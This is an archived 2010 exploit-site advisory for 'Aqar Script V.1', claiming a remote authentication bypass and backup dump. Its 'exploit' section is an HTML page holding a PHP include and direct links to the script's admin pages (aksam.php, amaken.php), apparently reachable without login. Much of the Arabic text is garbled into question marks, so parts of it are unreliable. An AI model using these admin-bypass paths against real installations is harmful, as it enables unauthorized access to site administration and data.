Aqar Script V.1 Remote By pass Exploit
Posted on 11 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Aqar Script V.1 Remote By pass Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================== Aqar Script V.1 Remote By pass Exploit ====================================== ======================================================================================== | # Title : Aqar Script V.1 Remote By pass Exploit | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.iqs3cur1ty.com/vb | # Script : Powered By AqarScript | # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu) | # Bug : Backup Dump ====================== Exploit By indoushka ================================= # Exploit : <html dir=rtl> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> </head> <body> <table border="0" cellspacing="5" cellpadding="0"> <tr> <td width="100%" colspan="3" valign="top" align="right"> <h1>???? ?????? - ???? ??????</h1> </td> <td width="100%" valign="top" align="right"> </td> </tr> <tr> <td valign="top" align="right" nowrap> <?php include("./qa2ema.php"); ?> </td> <meta http-equiv="Content-Language" content="ar-eg"> <td valign="top" align="right"><font face="Tahoma">????? ?? ?? ???? ?????? ?????? ????? ??????<br> ?? ??? ???? ????? ????? ????? ?????? ?? ???? ??????? <br> ????? ?????? ?? ?????? 2<br> <br> <b><font size="1">?? ????? ???? ??</font></b></font> </tr> </table> </body> <ul> <li><a href="http://127.0.0.1/Aqar/admin/aksam.php">???????</a></li> <li><a href="http://127.0.0.1/Aqar/admin/amaken.php">??????? ????????</a></li> </ul> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>